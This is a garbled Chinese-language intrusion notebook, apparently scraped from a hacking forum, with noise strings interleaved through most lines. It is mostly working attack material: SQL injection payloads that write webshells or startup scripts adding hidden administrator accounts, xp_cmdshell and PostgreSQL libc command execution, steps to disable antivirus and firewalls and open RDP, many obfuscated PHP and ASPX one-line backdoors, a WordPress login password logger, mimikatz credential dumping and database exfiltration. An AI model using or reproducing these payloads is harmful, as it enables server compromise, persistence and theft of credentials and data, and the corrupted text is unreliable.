% p7 R9 w7 y; Z2 Bcreate table a (cmd text);9 h7 T# T4 k! h4 v5 A# D
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( G% C: |% _' m% J7 _
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
1 B) J- W0 ?+ t1 d8 g& Y' |insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( ]! [; \8 @1 t& ~9 cselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
+ V& e. u) a8 H8 B/ k2 Ddrop table a;
# K( [: A% w7 z# }5 U `1 C8 m* X8 `4 x+ ?' F' z3 U
英文版本:
R" k2 W' p5 G9 i6 f8 k) K' I. ?' ~6 ?! l: h
use test;
9 C+ Z0 h+ c( q% y, }8 Screate table a (cmd text);9 K6 l) Y7 C0 `+ m# X
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
0 {/ q; b: k! o l- ]; Oinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
6 I" l- `9 q8 }8 k, u: {! jinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );2 y- _7 w' j) S7 P3 P( T
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";( J; S4 T g/ m( P
drop table a;* _4 z4 Z1 v9 i
/ f& V4 s; H& K2 V+ R
create table a (cmd BLOB);
* ]: {( M3 T" C2 @% ^+ ^; ^insert into a values (CONVERT(木马的16进制代码,CHAR));
! L: T0 N# X$ m) Aselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
- f' X! M9 z# C+ s0 Xdrop table a;
: m8 ~8 Y3 u! `. \" d4 c
$ U0 S0 \0 m* ?. E记录一下怎么处理变态诺顿
6 M$ L2 Z2 f" C0 n2 }9 Z查看诺顿服务的路径
# G8 q2 Q8 O+ h* r$ b; psc qc ccSetMgr
% c! u1 m% @! i, M然后设置权限拒绝访问。做绝一点。。
# |8 [1 ?" Q- G+ M7 Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
- }$ Q! ?6 f. Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
! c2 y6 F5 |' ^+ v% Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' F3 |8 t: }% f' I1 icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
; l- |3 r4 l( t1 Z8 }1 I3 I, q) B/ Y2 X8 h# k/ K6 C
然后再重启服务器+ C, r& { H$ d# d3 s ~5 Z+ Y
iisreset /reboot
' X/ |: _" {0 W$ D2 Y+ {这样就搞定了。。不过完事后。记得恢复权限。。。。( ]1 |3 f3 [, K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
% r" Y/ H v) z0 u& Rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
9 e2 U0 W. l* P& h$ p' \0 ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
' |& P9 g4 U7 s: pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
6 y' X" A0 x" h7 r* MSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
_" k8 l9 P7 g0 A1 A5 F; o
- g: V4 `& _ ~EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')& t4 y/ b: F7 |0 |* [
2 T5 f* y& j3 y3 J" H F A0 H% u, n
postgresql注射的一些东西
. v9 q, Z! X$ k如何获得webshell9 F1 ]) N/ M( k! ]. Z8 S3 u2 P S
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 4 s. Y% f! h: D) l5 m7 Q/ U2 T
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 \# \; \( o0 t" Fhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;) f* L- U, h* G/ i7 q8 ]$ @
如何读文件( u% e; f% [' `5 l) C
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);, t4 l: \3 F0 V0 G5 L+ P
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;- z( z2 R8 I+ P
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
( U+ q7 r, C2 T
( C1 G% B! @) \z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
7 T+ c' \2 u* m" R+ z6 g$ B当然,这些的postgresql的数据库版本必须大于8.X7 ]2 ^* m9 }$ C k! s) {
创建一个system的函数:
]2 A' q0 n8 uCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
7 A+ O' D; a2 q; _) `% n( F- k2 w" G" R! @3 o- `5 f1 r
创建一个输出表:
# q$ R3 \" E4 W; E2 y5 LCREATE TABLE stdout(id serial, system_out text)3 _( t$ n3 M5 L* y8 p( o
& }* j+ l4 h) p! Q' ^8 d0 {执行shell,输出到输出表内:
" s9 v! B/ W5 N- gSELECT system('uname -a > /tmp/test')' {9 {( W2 K3 B9 H5 X
; o$ ]5 g2 ?* z6 A% V' d- W8 A
copy 输出的内容到表里面;
5 H0 X4 q5 x0 ^$ O4 C1 a& I& YCOPY stdout(system_out) FROM '/tmp/test'
4 v: z" p- r/ v
8 x' Y$ z; T8 i2 W! ^1 f; _从输出表内读取执行后的回显,判断是否执行成功
. Q5 Z1 b/ Q8 a7 {7 [# a; L' x. B" Z; F u/ ?0 [
SELECT system_out FROM stdout
3 u0 K9 A' Z; e, e) F下面是测试例子! e" Y4 d1 L" A, @# R, u# S
' o1 h* u) p" U( L
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
; P. e4 U3 \" P! E0 T0 `% X3 y, G) N8 D
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'/ b7 u8 M7 A" {5 D ^
STRICT --
) b$ Y( ]+ m- o( K, N9 l, m& r7 g0 R# A
/store.php?id=1; SELECT system('uname -a > /tmp/test') --1 \+ N# T: t2 ]" U" e- X
& e: o F: ~; k7 j% U! R) S/ m/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
, R& _( Q' P7 A( l: J8 ~% K$ c- ?* i0 Q7 u- e
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--7 w( E: Y z* p
net stop sharedaccess stop the default firewall
$ ^6 e/ j/ V/ L" @netsh firewall show show/config default firewall
. O' p* T& N% tnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
! v. l9 e9 q$ d. x. F3 Fnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall; N3 N( r8 t* x* p+ O& ?
修改3389端口方法(修改后不易被扫出)* i% c- B% u0 b. s2 z+ P: e
修改服务器端的端口设置,注册表有2个地方需要修改
' _8 p4 e1 a! U9 X
/ `1 J" M1 `; d( d4 } C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
' R; a* p+ X5 IPortNumber值,默认是3389,修改成所希望的端口,比如6000. H* K3 X9 b. b4 a! G
6 n" X: Q4 F* q: a% I第二个地方:
. J$ q' |' W. K- L% f0 `, c4 V! C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] / G9 e4 b# \. O5 a1 B2 z
PortNumber值,默认是3389,修改成所希望的端口,比如6000. B% t, G5 w& i' P: q
0 V6 J& K; l- Q/ y9 J9 S现在这样就可以了。重启系统就可以了' o, d/ }$ C. b" Y- Y5 K* c K( q
% [7 Y! N/ z( u: o8 Y# L查看3389远程登录的脚本8 a4 N, b- ^# ?6 g* Y
保存为一个bat文件
3 Q: l6 m6 K$ _/ \$ k; Edate /t >>D:\sec\TSlog\ts.log
3 F4 H# V7 a9 |8 ~# @" ^) ?% k) ztime /t >>D:\sec\TSlog\ts.log
# z% m, X7 Z: Bnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log4 C X( D: c3 z
start Explorer
& W! i* [# P2 W: m; a
0 }9 x4 w' |$ f# d e6 [: Tmstsc的参数:
. G6 d( z B8 L/ c/ \, z5 Z% {6 j+ Y4 |& o# }
远程桌面连接
& @& O" h! e" @, { l, ~- B U2 h1 w( y5 N/ P# f6 t- i# `' g0 j+ q
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]: e% z% O! g6 O) y8 R/ P% R
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?& M/ U9 Z( i' @" ?' V
/ N. s( P9 ]8 c+ t$ e
<Connection File> -- 指定连接的 .rdp 文件的名称。
$ H! M' ~# m; v$ j6 Z8 a& h- e
m4 d5 [# ~4 H I) g2 [5 _5 b/v:<server[:port]> -- 指定要连接到的终端服务器。+ H% L( Z5 v% _& g) O/ m5 O
3 @& C0 J0 w# }+ ], G4 {% {
/console -- 连接到服务器的控制台会话。
3 _2 M; ?4 ~ ?# s6 z! B+ {# f! \/ _8 i7 _, n: \, N
/f -- 以全屏模式启动客户端。
, Z' p. M+ U3 j8 U8 U" y* |! w% l. I
/w:<width> -- 指定远程桌面屏幕的宽度。
6 _; L2 i) G- Y( \* }) V& C7 U; c/ T7 |) k( L
/h:<height> -- 指定远程桌面屏幕的高度。7 c* A( Y2 _. |! s& T, U
4 I9 u+ y, J( [. T" u
/edit -- 打开指定的 .rdp 文件来编辑。
( f: T; _1 _) q) f- A; p
3 P0 r7 V5 N. \. I/migrate -- 将客户端连接管理器创建的旧版2 x2 |* C2 n# _/ \
连接文件迁移到新的 .rdp 连接文件。# C. H, ?' t" d; K3 A; z
3 j, K5 E+ p7 h5 x+ \
; z% E& W8 o% V+ u" _7 |3 t
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ c! D" y% w, o7 }mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
& o$ o+ [( A. I- R5 t5 A) P
+ @1 z! p$ j" r% `: i, d命令行下开启33892 t5 p3 R, A- B1 [. m! I: p4 N
net user asp.net aspnet /add5 [2 g/ C3 y& J9 o) h$ d0 b
net localgroup Administrators asp.net /add$ Z$ p0 L: e& j; I
net localgroup "Remote Desktop Users" asp.net /add! a, }- j1 K6 _6 |. Z0 O( Z
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D, k; L0 u7 c, H; F3 v( s( ? L
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
0 I+ ^+ F) o/ [$ b9 h% Q* e/ qecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1! ?3 J9 a! W4 I, ~; O
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f! E$ `6 [+ Y: X& x3 x3 S, ~
sc config rasman start= auto Q7 ]/ L# E) t6 m
sc config remoteaccess start= auto
3 i2 g- r- y7 [% D6 Xnet start rasman
# N% I/ F q) R K' [net start remoteaccess' H4 n4 a% _1 G
Media
: [) l7 j3 I( L! j: i3 w7 Z' p<form id="frmUpload" enctype="multipart/form-data"
e' ?! o# l5 eaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
) ^2 q h. y, D! B2 J: G0 ~<input type="file" name="NewFile" size="50"><br>0 z$ ?+ R0 ?9 G
<input id="btnUpload" type="submit" value="Upload">
( L9 l- s g; [/ {</form>8 T; a3 U( u" q$ a. P
5 p4 [4 [1 \. Gcontrol userpasswords2 查看用户的密码9 j' c- C- ~2 i$ s+ r
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
4 P6 h `/ t% A, bSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
& V7 \( A2 J2 S! n, k T. q0 v% L/ a
4 ~% }" m" Q8 r; K141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:6 S! e9 }, n5 D% P1 K# s0 ~
测试1:% ?7 s% N, _: `) T) M3 `
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
7 L* C0 e# A: h$ a" e f9 W$ i' d) A
' J4 E% ]& F) L* m% U测试2:
8 q3 r6 x. Y% h
) K9 P* c' Y: n" [3 Dcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
I1 V: Z2 c- h/ [. d! y" K, t' i6 w- ^2 [2 h
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 n$ n5 i7 N5 j% X, l+ C ]7 \4 m& f( s; Y3 T. \2 L
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1& N4 p% }2 F0 x) Z* g. |- p
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令+ T6 R& h# F3 O) S0 k6 j4 }/ l
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
8 p T) j. x4 ]+ U% ~2 l$ |net stop mcafeeframework7 ^' }2 f2 V: h: q! ?
net stop mcshield
% h6 u7 _% c) t( v- ^net stop mcafeeengineservice- \& V0 t: v" Q. p+ i7 E: `
net stop mctaskmanager5 }8 V6 i; L, ?
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
6 {) \- ~8 i6 L. K+ p6 j% e
2 Q/ b" Z, w" h0 v" n7 B VNCDump.zip (4.76 KB, 下载次数: 1) " Z) z- s P) A
密码在线破解http://tools88.com/safe/vnc.php7 k. ]4 g' x9 r$ N- T6 a, ?3 W# T% B
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取7 G% s, F: I- r- r- J5 K
5 ~( L6 Z; X/ a5 D! R- T+ C6 |! Aexec master..xp_cmdshell 'net user'
$ y5 K# h; M/ ~' m0 `& P( smssql执行命令。
- h3 T8 z L% W2 h获取mssql的密码hash查询
( \; _' U+ V! X5 {% pselect name,password from master.dbo.sysxlogins7 n# n# Z5 L/ v* |5 `- N% `/ ^
+ i5 Z4 W! h0 M* T. K$ H; N
backup log dbName with NO_LOG;: U4 d$ M+ v: ~: C* n. I1 c$ y3 Y
backup log dbName with TRUNCATE_ONLY;
# c9 G9 g$ ]3 ?' ?DBCC SHRINKDATABASE(dbName);
% ]3 Z9 e- H0 ^7 Y4 nmssql数据库压缩
* y. B" _' e& V7 U$ D
4 W5 N2 k& c6 d5 R( g" F* wRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK; @0 g7 |8 ]4 E) h/ M0 c
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" J2 a; K! p) }# m2 ]: ]
L+ A: Y$ y; `$ r0 @: u# t
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'1 `( P4 d, r$ G3 j
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
" S( ]0 D2 F4 y0 N" S; f6 x K+ g* R" W, Z9 R) m) [4 q
Discuz!nt35渗透要点:
8 c. U0 w- X# r- l(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
1 \7 q4 T" ~2 j" {(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>2 ?! p- H' V( C; ?& g) K0 _
(3)保存。6 x5 T7 V3 K% }1 D# y9 E9 A
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 l6 Z/ N* i7 [# P. ^3 [- x) ?1 sd:\rar.exe a -r d:\1.rar d:\website\
' h* J' z8 N9 b; v# w9 F递归压缩website& U' K% H/ d o+ V
注意rar.exe的路径( J0 d( i! ?' W7 Z* x- G4 G3 i- s
$ {9 B: K, h( }. q9 O
<?php
5 ?- Z) f" ^9 m T! c$ [" C3 m
- F5 s u2 d1 C& b$telok = "0${@eval($_POST[xxoo])}";
: f# |6 \: \7 {8 a( A( S) F3 t6 I2 ]+ ` t
$username = "123456";" A6 m. c0 M) @$ ~! C
& I( j; W9 B) M9 |* _" a, O$userpwd = "123456";* Z* U" H/ n7 Z
" N: j- v, i' L) i: |# O
$telhao = "123456";
' |& b' M' i5 `5 \
' z- C n5 g7 K2 x" n: I$ x2 X4 E$telinfo = "123456";
2 R8 b( n8 N. A) n" F: E6 o. a) ~ n- W9 t$ J. v) y/ d/ L
?>; s8 R! S" w" V
php一句话未过滤插入一句话木马
7 C' Y; u. _2 }- y9 Y! X/ M
/ D, C' B: g" ^; r* C' F站库分离脱裤技巧
' \ ?8 T" f! e. `exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'/ a% f! m- ^' g8 E: A7 k
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
" O- n+ F4 r" O% T, q+ B条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。' v* O; {: C( z
这儿利用的是马儿的专家模式(自己写代码)。
8 ? `& ] ~% o+ B4 ]9 z0 qini_set('display_errors', 1);( R, ?! F h$ k: F9 t/ z, a
set_time_limit(0);! t2 S Y* U! c6 e" Q7 q% l
error_reporting(E_ALL);. k' W6 V( O" p$ H
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
/ x1 F, B7 @' w: {mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
1 G2 K# s: C, T2 u' C# W) a$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
8 D9 n. o6 h6 H t$i = 0;
: D, Z+ z3 \1 n, y; l" _$tmp = '';
1 l- B/ `; x1 t# j4 q% iwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {8 d8 w. r3 k" a1 g' h, A& x
$i = $i+1;6 G1 C4 G7 q$ q: G. n$ u+ `
$tmp .= implode("::", $row)."\n";
+ G2 z, ]: a3 K! i, R$ {$ d6 B if(!($i%500)){//500条写入一个文件
1 T C7 v: a; Q& E& A $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
) z8 v+ O) {6 G% [. R6 k- P file_put_contents($filename,$tmp);
6 k+ J: u6 S5 J& v, u- z9 p $tmp = '';
# v* U& d9 B1 X1 | }8 A8 Z9 M4 s0 Z! {, X: Z
}! v p- N% ~) ~, P1 f6 c |$ ]
mysql_free_result($result);
8 D. G. P; o* l" T* w
2 b& W: } T! F$ n0 z7 m9 C! L7 P: }2 {& \! G' _
7 |: j) T! @3 s, j7 \//down完后delete0 V: T+ t, G+ ~/ Q5 U
; e" N* i5 [4 i; q4 O6 X$ S. I9 t' G. t) ^8 J
ini_set('display_errors', 1);
) r) T! A( Z- x3 werror_reporting(E_ALL);
, R9 _( c$ Q/ _6 D2 a$i = 0;4 F1 y2 j% I3 w/ `
while($i<32) { F# w$ D, h' a2 f/ ?
$i = $i+1;, Y X$ `4 q# M. e8 s
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
5 u: |7 J4 z2 T6 J unlink($filename);* n# j* L$ Z6 D% o) S& G' X4 z9 A( s
} 2 u$ m/ R8 R- h4 q: Y
httprint 收集操作系统指纹' k. N* s0 n) r( \5 S- F' U+ d- P# j
扫描192.168.1.100的所有端口3 o& J+ Y7 u% ~5 ?5 z
nmap –PN –sT –sV –p0-65535 192.168.1.100
+ @' x2 U% J' k# c6 N) j( l# a4 Y& jhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
% I. D6 b& b9 c9 J( @host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输4 K% f7 \/ k! f7 ?% @
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host, y! z6 ~, r# [9 g
$ Y9 B" M, t9 D! |5 x, g; _
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)+ V. i. c& z; e7 _+ n
9 x( L% H- r$ Y MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
! @( ]' h( C4 U. I8 D2 n" w9 I$ s8 D1 o" D7 ~/ h
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
# u' K- Q% b3 O; |$ M/ n- ]' J
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)! W# h# t/ t( W
/ z' w* u7 Y4 F' R Q/ o* t http://net-square.com/msnpawn/index.shtml (要求安装)& Q3 z4 B. b( B% E1 K( o; t* ]% f& p
$ e0 s4 @1 L" {( y
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)4 }9 U8 P5 H' m4 S+ B, i: w
- o4 P# k# C( y% I0 \ SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)) a) ?! h: S: E: P' t
set names gb23128 R P: Q; n# P+ g2 M# |/ Z
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' i3 [8 |3 K/ U8 z$ y1 D% c- K
& {4 `9 I7 p5 f8 i: ~8 [( Mmysql 密码修改
; J' A% Y4 d# l1 G: K% IUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” , ]! L7 e. E* H7 @! I0 E8 Z
update user set password=PASSWORD('antian365.com') where user='root';
+ p0 g/ a8 B7 r+ U. L+ X3 q$ eflush privileges;" x' J5 s/ j! [: ]: T
高级的PHP一句话木马后门
) S% W0 ^! C% |% g- L( ^7 N7 c; l5 k/ E, W7 x+ P5 n
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀* B0 ~" o& A: S/ C4 B
) d) h, q1 w: N8 k* G3 x1、7 f( z; r% j; x5 `9 g
8 A, E( t4 F n5 n
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";. U4 J- I) U0 Q/ ]
1 C2 \7 d6 A: u! b. \2 L0 r6 L
$hh("/[discuz]/e",$_POST['h'],"Access");
( \! C2 U1 _- `/ R, f. d" j# n3 @: H: W$ n! @
//菜刀一句话# L% u+ C% s5 x7 _5 j( n' B
2 i( [0 w. F+ s/ G
2、, G: ~. Z# E" R% w1 D) {
9 f+ S4 f4 j" m5 u1 {
$filename=$_GET['xbid'];4 ^- W) n# b: G) l
8 ]4 ?( w6 h# I; y: l' Tinclude ($filename);
0 g% f Y5 J8 x+ C- s7 t. M5 i; d5 M: c. O
//危险的include函数,直接编译任何文件为php格式运行2 \& L8 b5 R# u- r1 o
' j5 k L, ]% G$ r' O; c# J
3、2 h2 j0 b% e4 {
2 a6 V4 K+ V5 ?1 R
$reg="c"."o"."p"."y";
* N: ?) N6 k# [8 R& [: t$ Y: B1 v. M/ E) \) W4 h1 e
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
. S3 F# h" i5 e2 P! Z& \# G9 ~* m! ^0 e7 n4 p1 r2 b' H: j
//重命名任何文件0 k# G+ P/ [% b! [" [/ L' M
& l' o; h T* ]% Z7 R2 K9 [- d8 G4、
1 e9 D8 n0 r! G
' H+ G L5 S+ B4 K8 c# i$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
5 M( g8 L; x& |
8 h0 n" n9 F7 R$gzid("/[discuz]/e",$_POST['h'],"Access");* }5 R$ H3 |/ a# M5 f) ~, |9 ]
& _( l1 }7 S. g
//菜刀一句话
2 |( K: u* V+ e' D% F u, y; X. y2 }5 d6 [+ v1 C+ @
5、include ($uid);" R! p: I" j/ {
1 x$ s+ j6 @' Y* v) r& h//危险的include函数,直接编译任何文件为php格式运行,POST
m) y* C' {* m6 t, R0 E, Q" k- a/ T- t( S* e" h6 b$ b) n1 W
+ a3 n' k7 W7 Q& ^
//gif插一句话& h6 D5 ]7 G2 u% O
* k' s3 k- H: v, y' |% l
6、典型一句话
! V2 o' X- i X2 @. P3 F
" c6 s N) h0 X W程序后门代码
& z% o6 Z7 b3 K+ f/ r<?php eval_r($_POST[sb])?>
9 t9 B ]$ z, n; m$ `5 s程序代码
9 T5 d4 X, ?* N2 j2 Z4 h<?php @eval_r($_POST[sb])?>
. j) s0 C# u+ w. \! C' E* C//容错代码
$ t) l5 ~+ F1 q" x7 ^$ R) K7 L程序代码# i) e$ W( G1 j, Z
<?php assert($_POST[sb]);?>
: |, ]* B6 M) b. \3 {' M# m//使用lanker一句话客户端的专家模式执行相关的php语句
9 g- L' y) z, [程序代码
. U2 Y: l' a7 J/ ~<?$_POST['sa']($_POST['sb']);?>, x1 P3 s7 C7 a$ o# z5 E
程序代码
8 g6 a* d0 `* |& z8 b) W<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
: k: g) y, `3 W) Z7 D0 x程序代码
" T0 B5 j7 _8 L" T3 x<?php
% F0 Z# J2 V3 l2 ]& c% s@preg_replace("/[email]/e",$_POST['h'],"error");
# o: u& n; l! f0 A?>
+ R+ \+ m9 d, Q1 R3 ^2 b//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
- \0 @1 `2 ^5 h! E& I/ ~$ \程序代码
! c% `! P( \( e X% w2 x% S<O>h=@eval_r($_POST[c]);</O>
4 }4 L* B# w4 q3 D5 b7 n程序代码
9 e t! T+ F; V) m+ V<script language="php">@eval_r($_POST[sb])</script>- r" b# j5 ^% E2 n/ A* V
//绕过<?限制的一句话
3 d! V' [+ j" g) i7 ?
, W1 U* v" E1 W* M( [0 S/ \ ~http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip" E" @+ {4 L; ~- L5 u+ @9 ?
详细用法:
5 _ X0 Z7 H- t7 g! w, l0 z4 M1、到tools目录。psexec \\127.0.0.1 cmd
+ \ D' Q* Y7 j4 ~; a% N2、执行mimikatz
- t; g2 H6 d% y3、执行 privilege::debug2 B; ~2 r8 ^& @7 |0 U; z) \
4、执行 inject::process lsass.exe sekurlsa.dll
8 M/ m" p. v8 A, U" e5、执行@getLogonPasswords0 ~' }6 {% z+ F- w
6、widget就是密码
/ u9 U# ~/ {) ~. K: P" r7、exit退出,不要直接关闭否则系统会崩溃。
- o+ M2 ^/ K4 g& r8 R, a) h6 i( ~# a
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面! c; Y8 M8 P1 Z6 C: P! a" r
/ V& Z' D: g4 `# Y0 R
自动查找系统高危补丁
, o! w m8 C4 }! | |& a( I4 Q$ ssysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
1 b, W) `/ k3 W/ e
9 [) g- a1 \+ }. b; a3 K突破安全狗的一句话aspx后门0 A9 w4 C& K7 e" u; A
<%@ Page Language="C#" ValidateRequest="false" %>0 E! q4 v* M7 e- v" ]% a
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
% Y' P3 A2 ?- J, l4 m% y1 n( Zwebshell下记录WordPress登陆密码/ @1 r0 N2 o8 m: k' K9 V$ X
webshell下记录Wordpress登陆密码方便进一步社工
! g) ]% D2 x: a6 Z0 P; [在文件wp-login.php中539行处添加:
9 d, W: y% _, k5 f// log password
: a) [5 J1 `- w7 o6 P$log_user=$_POST['log'];$ E7 ^/ `+ D8 t( p, @* I. o# c
$log_pwd=$_POST['pwd'];
+ O/ c6 Y. u* P5 c& S; q+ W$log_ip=$_SERVER["REMOTE_ADDR"];
: K3 F5 e* H# G- \1 A# b" i$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
/ F/ N$ k: [# Q) f2 O. K5 G% I5 e$txt=$txt.”\r\n”;" P Z1 C# F' z/ f/ I; P/ P3 o
if($log_user&&$log_pwd&&$log_ip){
3 [1 n" v/ n" c# s@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
" F( G5 x& U5 f0 y6 H& {8 h: i$ u}
0 Z( _7 z; c3 `: d6 q7 ]8 q8 d当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
6 E. t! U2 B5 g/ A) V$ |' Q# O就是搜索case ‘login’( J* d# f0 e, B1 {
在它下面直接插入即可,记录的密码生成在pwd.txt中,7 u% x3 t, l. m" g
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
0 R+ v/ f: Q" N& s# S. x3 y* f' H/ a利用II6文件解析漏洞绕过安全狗代码:9 \8 k- Y8 i9 y
;antian365.asp;antian365.jpg
9 B/ j- h+ M6 J/ I- z% q, e+ W* y
